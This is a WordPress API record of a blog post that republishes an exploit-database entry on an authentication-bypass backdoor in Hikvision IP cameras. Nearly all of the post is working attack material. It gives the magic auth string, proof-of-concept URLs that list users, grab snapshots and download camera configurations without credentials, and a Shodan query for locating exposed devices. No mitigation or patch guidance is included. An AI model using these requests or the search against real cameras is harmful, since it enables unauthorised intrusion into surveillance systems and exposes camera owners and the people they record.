{"id":21856,"date":"2022-03-16T20:58:31","date_gmt":"2022-03-16T17:58:31","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/166334\/hikvision-backdoor.txt"},"modified":"2022-03-19T09:41:03","modified_gmt":"2022-03-19T06:11:03","slug":"hikvision-ip-camera-backdoor","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/hikvision-ip-camera-backdoor\/","title":{"rendered":"Hikvision IP Camera Backdoor"},"content":{"rendered":"<p dir=\"ltr\"># Exploit Title: Hikvision IP Camera &#8211; Backdoor<br \/>\n# Date: 14\/03\/2022<br \/>\n# Exploit Author: Sobhan Mahmoodi<br \/>\n# Reference: https:\/\/ipvm.com\/reports\/hik-exploit<br \/>\n# GitHub: https:\/\/github.com\/bp2008\/HikPasswordHelper\/<\/p>\n<p dir=\"ltr\">Hikvision included a magic string that allowed instant access to any camera, regardless of what the admin password was. All that needed was appending this string to Hikvision camera commands: (?auth=YWRtaW46MTEK)<\/p>\n<p dir=\"ltr\"># Proof of Concept:<\/p>\n<p dir=\"ltr\">Retrieve a list of all users and their roles:<br \/>\n&#8211; http:\/\/camera.ip\/Security\/users?auth=YWRtaW46MTEK<\/p>\n<p dir=\"ltr\">Obtain a camera snapshot without authentication:<br \/>\n&#8211; http:\/\/camera.ip\/onvif-http\/snapshot?auth=YWRtaW46MTEK<\/p>\n<p dir=\"ltr\">Download camera configuration:<br \/>\n&#8211; http:\/\/camera.ip\/System\/configurationFile?auth=YWRtaW46MTEK<\/p>\n<p dir=\"ltr\">Shodan link to monitor :<br \/>\nhttps:\/\/www.shodan.io\/search?query=%22App-webs%22+%22200+OK%22<\/p>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: Hikvision IP Camera &#8211; Backdoor # Date: 14\/03\/2022 # Exploit Author: Sobhan Mahmoodi # Reference: https:\/\/ipvm.com\/reports\/hik-exploit # GitHub: https:\/\/github.com\/bp2008\/HikPasswordHelper\/ Hikvision included a magic string that allowed instant access to any camera, regardless of what the admin password was. All that needed was appending this string to Hikvision camera commands: (?auth=YWRtaW46MTEK) # Proof &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-21856","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/21856","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=21856"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/21856\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=21856"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=21856"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=21856"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}